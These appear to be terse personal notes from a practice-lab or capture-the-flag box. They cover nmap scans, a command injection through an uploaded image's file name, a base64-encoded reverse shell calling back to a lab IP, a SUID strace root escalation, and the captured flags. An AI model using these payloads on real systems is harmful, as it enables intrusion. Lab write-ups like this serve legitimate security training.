Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
Services
22 ssh
80 http
http
Thoughts
Instantly “magic” means magic bytes, its probably filtering by that. We can edit the magic bytes on a php revshell and exec to bypass
lmao actually you can just change the file extension
This was NOT it (FUCK)
lesson: search github issues for specific leaked version !!!!!!!
Can trigger with:
cp test.png '|exec"`nc 192.168.45.171 80`".png'
Upload and check listener
We got command exec.
lmao we gotta do some encoding
cp test.png '|rev"`echo MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC8xOTIuMTY4LjQ1LjE3MS80MjA2OTsgc2ggPCYxOTYgPiYxOTYgMj4mMTk2 | base64 -d | bash`".png'
we got a shell back
SUID
find / -perm -u=s -type f 2>/dev/null
/usr/bin/strace
/usr/bin/strace -o /dev/null /bin/sh -p
www-data@image:/var/www/html$ /usr/bin/strace -o /dev/null /bin/sh -p
/usr/bin/strace -o /dev/null /bin/sh -p
#
local
ab530f963f7745bbf96b0c8991a4b936
proof
83e8c7fe7814154b3c6e6beafaa43c6a